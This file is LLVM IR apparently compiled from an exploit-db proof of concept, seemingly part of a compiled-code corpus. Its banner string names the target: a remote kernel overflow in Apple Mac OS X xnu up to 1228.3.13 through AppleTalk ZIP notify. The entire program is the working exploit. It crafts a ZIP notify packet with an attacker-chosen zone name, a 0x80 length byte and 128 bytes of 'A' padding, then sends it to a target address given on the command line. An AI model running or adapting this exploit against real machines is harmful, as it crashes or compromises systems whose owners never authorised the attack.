; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_8262.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_8262.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.sockaddr_at = type { i32, i32, i32 }
%struct.sockaddr = type { i32 }

@.str = private unnamed_addr constant [157 x i8] c"Apple MACOS X xnu <= 1228.3.13 appletalk zip-notify remote kernel overflow PoC\0Aby: <mu-b@digit-labs.org>\0Ahttp://www.digit-labs.org/ -- Digit-Labs 2008!@$!\0A\0A\00", align 1
@stderr = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [40 x i8] c"Usage: %s <dst addr> <zone> [src addr]\0A\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [34 x i8] c"* dst address: atalk_aton failed\0A\00", align 1
@.str.3 = private unnamed_addr constant [34 x i8] c"* src address: atalk_aton failed\0A\00", align 1
@AF_APPLETALK = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [22 x i8] c"* netddp_open failed\0A\00", align 1
@.str.5 = private unnamed_addr constant [20 x i8] c"Appletalk dst: %s, \00", align 1
@.str.6 = private unnamed_addr constant [10 x i8] c"src: %s, \00", align 1
@.str.7 = private unnamed_addr constant [13 x i8] c"zone: %s... \00", align 1
@DDPTYPE_ZIP = common dso_local global i32 0, align 4
@ZIPOP_NOTIFY = common dso_local global i32 0, align 4
@.str.8 = private unnamed_addr constant [24 x i8] c"* netddp_sendto failed\0A\00", align 1
@.str.9 = private unnamed_addr constant [6 x i8] c"done\0A\00", align 1
@EXIT_SUCCESS = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca %struct.sockaddr_at, align 4
  %7 = alloca %struct.sockaddr_at, align 4
  %8 = alloca i8*, align 8
  %9 = alloca [1024 x i8], align 16
  %10 = alloca i32, align 4
  %11 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %12 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([157 x i8], [157 x i8]* @.str, i64 0, i64 0))
  %13 = load i32, i32* %4, align 4
  %14 = icmp slt i32 %13, 3
  br i1 %14, label %15, label %23

15:                                               ; preds = %2
  %16 = load i32, i32* @stderr, align 4
  %17 = load i8**, i8*** %5, align 8
  %18 = getelementptr inbounds i8*, i8** %17, i64 0
  %19 = load i8*, i8** %18, align 8
  %20 = call i32 (i32, i8*, ...) @fprintf(i32 %16, i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str.1, i64 0, i64 0), i8* %19)
  %21 = load i32, i32* @EXIT_FAILURE, align 4
  %22 = call i32 @exit(i32 %21) #3
  unreachable

23:                                               ; preds = %2
  %24 = load i8**, i8*** %5, align 8
  %25 = getelementptr inbounds i8*, i8** %24, i64 1
  %26 = load i8*, i8** %25, align 8
  %27 = getelementptr inbounds %struct.sockaddr_at, %struct.sockaddr_at* %6, i32 0, i32 2
  %28 = call i32 @atalk_aton(i8* %26, i32* %27)
  %29 = icmp ne i32 %28, 0
  br i1 %29, label %35, label %30

30:                                               ; preds = %23
  %31 = load i32, i32* @stderr, align 4
  %32 = call i32 (i32, i8*, ...) @fprintf(i32 %31, i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.2, i64 0, i64 0))
  %33 = load i32, i32* @EXIT_FAILURE, align 4
  %34 = call i32 @exit(i32 %33) #3
  unreachable

35:                                               ; preds = %23
  %36 = load i32, i32* %4, align 4
  %37 = icmp sgt i32 %36, 3
  br i1 %37, label %38, label %51

38:                                               ; preds = %35
  %39 = load i8**, i8*** %5, align 8
  %40 = getelementptr inbounds i8*, i8** %39, i64 3
  %41 = load i8*, i8** %40, align 8
  %42 = getelementptr inbounds %struct.sockaddr_at, %struct.sockaddr_at* %7, i32 0, i32 2
  %43 = call i32 @atalk_aton(i8* %41, i32* %42)
  %44 = icmp ne i32 %43, 0
  br i1 %44, label %50, label %45

45:                                               ; preds = %38
  %46 = load i32, i32* @stderr, align 4
  %47 = call i32 (i32, i8*, ...) @fprintf(i32 %46, i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.3, i64 0, i64 0))
  %48 = load i32, i32* @EXIT_FAILURE, align 4
  %49 = call i32 @exit(i32 %48) #3
  unreachable

50:                                               ; preds = %38
  br label %51

51:                                               ; preds = %50, %35
  %52 = load i32, i32* @AF_APPLETALK, align 4
  %53 = getelementptr inbounds %struct.sockaddr_at, %struct.sockaddr_at* %6, i32 0, i32 1
  store i32 %52, i32* %53, align 4
  %54 = getelementptr inbounds %struct.sockaddr_at, %struct.sockaddr_at* %6, i32 0, i32 0
  store i32 6, i32* %54, align 4
  %55 = load i32, i32* %4, align 4
  %56 = icmp sgt i32 %55, 3
  br i1 %56, label %57, label %58

57:                                               ; preds = %51
  br label %59

58:                                               ; preds = %51
  br label %59

59:                                               ; preds = %58, %57
  %60 = phi %struct.sockaddr_at* [ %7, %57 ], [ null, %58 ]
  %61 = call i32 @netddp_open(%struct.sockaddr_at* %60, i32* null)
  store i32 %61, i32* %10, align 4
  %62 = icmp slt i32 %61, 0
  br i1 %62, label %63, label %68

63:                                               ; preds = %59
  %64 = load i32, i32* @stderr, align 4
  %65 = call i32 (i32, i8*, ...) @fprintf(i32 %64, i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.4, i64 0, i64 0))
  %66 = load i32, i32* @EXIT_FAILURE, align 4
  %67 = call i32 @exit(i32 %66) #3
  unreachable

68:                                               ; preds = %59
  %69 = load i8**, i8*** %5, align 8
  %70 = getelementptr inbounds i8*, i8** %69, i64 1
  %71 = load i8*, i8** %70, align 8
  %72 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.5, i64 0, i64 0), i8* %71)
  %73 = load i32, i32* %4, align 4
  %74 = icmp sgt i32 %73, 3
  br i1 %74, label %75, label %80

75:                                               ; preds = %68
  %76 = load i8**, i8*** %5, align 8
  %77 = getelementptr inbounds i8*, i8** %76, i64 3
  %78 = load i8*, i8** %77, align 8
  %79 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.6, i64 0, i64 0), i8* %78)
  br label %80

80:                                               ; preds = %75, %68
  %81 = load i8**, i8*** %5, align 8
  %82 = getelementptr inbounds i8*, i8** %81, i64 2
  %83 = load i8*, i8** %82, align 8
  %84 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.7, i64 0, i64 0), i8* %83)
  %85 = getelementptr inbounds [1024 x i8], [1024 x i8]* %9, i64 0, i64 0
  store i8* %85, i8** %8, align 8
  %86 = load i32, i32* @DDPTYPE_ZIP, align 4
  %87 = trunc i32 %86 to i8
  %88 = load i8*, i8** %8, align 8
  %89 = getelementptr inbounds i8, i8* %88, i32 1
  store i8* %89, i8** %8, align 8
  store i8 %87, i8* %88, align 1
  %90 = load i32, i32* @ZIPOP_NOTIFY, align 4
  %91 = trunc i32 %90 to i8
  %92 = load i8*, i8** %8, align 8
  %93 = getelementptr inbounds i8, i8* %92, i32 1
  store i8* %93, i8** %8, align 8
  store i8 %91, i8* %92, align 1
  %94 = load i8*, i8** %8, align 8
  %95 = getelementptr inbounds i8, i8* %94, i32 1
  store i8* %95, i8** %8, align 8
  store i8 0, i8* %94, align 1
  %96 = load i8*, i8** %8, align 8
  %97 = getelementptr inbounds i8, i8* %96, i32 1
  store i8* %97, i8** %8, align 8
  store i8 0, i8* %96, align 1
  %98 = load i8*, i8** %8, align 8
  %99 = getelementptr inbounds i8, i8* %98, i32 1
  store i8* %99, i8** %8, align 8
  store i8 0, i8* %98, align 1
  %100 = load i8*, i8** %8, align 8
  %101 = getelementptr inbounds i8, i8* %100, i32 1
  store i8* %101, i8** %8, align 8
  store i8 0, i8* %100, align 1
  %102 = load i8*, i8** %8, align 8
  %103 = getelementptr inbounds i8, i8* %102, i32 1
  store i8* %103, i8** %8, align 8
  store i8 0, i8* %102, align 1
  %104 = load i8**, i8*** %5, align 8
  %105 = getelementptr inbounds i8*, i8** %104, i64 2
  %106 = load i8*, i8** %105, align 8
  %107 = call i32 @strlen(i8* %106)
  store i32 %107, i32* %11, align 4
  %108 = load i32, i32* %11, align 4
  %109 = trunc i32 %108 to i8
  %110 = load i8*, i8** %8, align 8
  %111 = getelementptr inbounds i8, i8* %110, i32 1
  store i8* %111, i8** %8, align 8
  store i8 %109, i8* %110, align 1
  %112 = load i8*, i8** %8, align 8
  %113 = load i8**, i8*** %5, align 8
  %114 = getelementptr inbounds i8*, i8** %113, i64 2
  %115 = load i8*, i8** %114, align 8
  %116 = load i32, i32* %11, align 4
  %117 = call i32 @memcpy(i8* %112, i8* %115, i32 %116)
  %118 = load i32, i32* %11, align 4
  %119 = load i8*, i8** %8, align 8
  %120 = sext i32 %118 to i64
  %121 = getelementptr inbounds i8, i8* %119, i64 %120
  store i8* %121, i8** %8, align 8
  %122 = load i8*, i8** %8, align 8
  %123 = getelementptr inbounds i8, i8* %122, i32 1
  store i8* %123, i8** %8, align 8
  store i8 -128, i8* %122, align 1
  %124 = load i8*, i8** %8, align 8
  %125 = call i32 @memset(i8* %124, i32 65, i32 128)
  %126 = load i8*, i8** %8, align 8
  %127 = getelementptr inbounds i8, i8* %126, i64 128
  store i8* %127, i8** %8, align 8
  %128 = load i32, i32* %10, align 4
  %129 = getelementptr inbounds [1024 x i8], [1024 x i8]* %9, i64 0, i64 0
  %130 = load i8*, i8** %8, align 8
  %131 = getelementptr inbounds [1024 x i8], [1024 x i8]* %9, i64 0, i64 0
  %132 = ptrtoint i8* %130 to i64
  %133 = ptrtoint i8* %131 to i64
  %134 = sub i64 %132, %133
  %135 = trunc i64 %134 to i32
  %136 = bitcast %struct.sockaddr_at* %6 to %struct.sockaddr*
  %137 = call i64 @netddp_sendto(i32 %128, i8* %129, i32 %135, i32 0, %struct.sockaddr* %136, i32 12)
  %138 = icmp slt i64 %137, 0
  br i1 %138, label %139, label %144

139:                                              ; preds = %80
  %140 = load i32, i32* @stderr, align 4
  %141 = call i32 (i32, i8*, ...) @fprintf(i32 %140, i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str.8, i64 0, i64 0))
  %142 = load i32, i32* @EXIT_FAILURE, align 4
  %143 = call i32 @exit(i32 %142) #3
  unreachable

144:                                              ; preds = %80
  %145 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.9, i64 0, i64 0))
  %146 = load i32, i32* @EXIT_SUCCESS, align 4
  ret i32 %146
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @fprintf(i32, i8*, ...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @atalk_aton(i8*, i32*) #1

declare dso_local i32 @netddp_open(%struct.sockaddr_at*, i32*) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @memcpy(i8*, i8*, i32) #1

declare dso_local i32 @memset(i8*, i32, i32) #1

declare dso_local i64 @netddp_sendto(i32, i8*, i32, i32, %struct.sockaddr*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
